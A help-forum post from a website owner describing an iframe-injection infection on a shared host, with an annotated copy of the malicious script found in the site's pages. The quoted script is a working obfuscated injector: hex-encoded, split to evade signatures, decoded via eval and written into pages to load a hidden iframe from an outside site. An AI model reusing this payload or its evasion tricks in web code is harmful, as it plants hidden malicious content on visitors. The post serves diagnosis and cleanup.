Hi
It seems our site (on a shared host) has been infected with an iframe virus.
Lots of our HTML / PHP files had iframe code added, pointing to 2 external, dodgy-looking websites.
(I have removed most of the code manually and / or copied over with a clean backup)
At the moment, when we try to upload index.htm or index.html,
the files are removed immediately from the FTP server, so the homepage doesn't load!
Please check out our site:
hxxp://www.visualiminals.com (HOMEPAGE NOT WORKING as mentioned above)
so please try
hxxp://www.visualiminals.com/products/genius.htm
I also found this script, which looks suspicious:
<!--
  Annotation for readers of this sample. The script itself is reproduced exactly as posted.
  * The first function is parseInt with radix 16. The name is built as 'pa'+'rseInt' and
    resolved through eval, so a plain-text search for "parseInt" does not find it.
  * The second function walks its argument two characters at a time and converts each
    hex pair to a character with String['fromCharCode'], returning the joined string.
  * vf1 is an empty string. Concatenating it after each 7 digit changes nothing at run
    time; presumably it is there to fragment the hex payload so fixed-string signatures
    do not match.
  * The final statements alias document and pass the decoded payload to document.write,
    so whatever the payload decodes to is injected into every page carrying this tag.
  * The payload begins with the hex for an opening script tag and contains the hex for
    document.write and unescape followed by percent-encoded data, i.e. a second encoding
    layer. It appears to emit an iframe styled visibility:hidden, which is consistent
    with the iframe injection described in the post. Decode it offline as text for
    analysis rather than loading it in a browser.
  * As quoted, the listing wraps in the middle of a string literal between the two
    lines below.
  * Deleting this tag from the affected files removes the symptom only. The post does
    not show how the files were modified, so the entry point still has to be found.
-->
<script>function c3257948b3q49f1af131e067(q49f1af131e44d){ function q49f1af131e835(){var q49f1af131ec1c=16;return q49f1af131ec1c;} return (eval('pa'+'rseInt')(q49f1af131e44d,q49f1af131e835()));}function q49f1af131f005(q49f1af131f3ec){ var q49f1af131f7d8='';q49f1af1320773=String['fromCharCode'];for(q49f1af131fbea=0;q49f1af131fbea<q49f1af131f3ec.length;q49f1af131fbea+=2){ q49f1af131f7d8+=(q49f1af1320773(c3257948b3q49f1af131e067(q49f1af131f3ec.substr(q49f1af131fbea,2))));}return q49f1af131f7d8;} var vf1='';var q49f1af1320b5b='3C7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E696628216D7'+vf1+'96961297'+vf1+'B646F637'+vf1+'56D656E7'+vf1+'42E7'+vf1+'7'+vf1+'7'+vf1+'2697'+vf1+'465287'+vf1+'56E657'+vf1+'363617'+vf1+'065282027'+vf1+'2533632536392536362537'+vf1+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+vf1+'332537'+vf1+'32253633253364253237'+vf1+'2536382537'+vf1+'342537'+vf1+'342537'+vf1+'302533612532662532662537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2537'+vf1+'37'+vf1+'2532652536322537'+vf1+'322536662536652536662537'+vf1+'342536312536622532652536332536652532662537'+vf1+'302536382537'+vf1+'302536642537'+vf1+'392536312536342536642536392536652532662536392536652536342536352537'+vf1+'382532652537'+vf1+'302536382537'+vf1+'30253366253237'+vf1+'2532622534642536312537'+vf1+'342536382532652537'+vf1+'322536662537'+vf1+'352536652536342532382534642536312537'+vf1+'342536382532652537'+vf1+'32253631253665253634253666253664253238253239253261253331253330253330253332253333253330253239253262253237'+vf1+'253330253333253237'+vf1+'2532302537'+vf1+'37'+vf1+'2536392536342537'+vf1+'34253638253364253337'+vf1+'253337'+vf1+'253331253230253638253635253639253637'+vf1+'2536382537'+vf1+'342533642533312533332533302532302537'+vf1+'332537'+vf1+'342537'+vf1+'39253663253635253364253237'+vf1+'2537'+vf1+'362536392537'+vf1+'332536392536322536392536632536392537'+vf1+'342537'+vf1+'39253361253638253639253634253634253635253665253237'+vf1+'2533652533632532662536392536362537'+vf1+'322
5363125366425363525336527'+vf1+'29293B7'+vf1+'D7'+vf1+'6617'+vf1+'2206D7'+vf1+'969613D7'+vf1+'47'+vf1+'27'+vf1+'5653B3C2F7'+vf1+'3637'+vf1+'2697'+vf1+'07'+vf1+'43E';q49f1af132132c=document;q49f1af132132c.write(q49f1af131f005(q49f1af1320b5b));</script>
We used McAfee Secure, which found 2 possible vulnerabilities:
1) Cross site scripting vulnerability in recommend a friend popup script
2) website stats script
I have contacted our host already but any tips to remove the threats and secure the site would be great!
Thank you in advance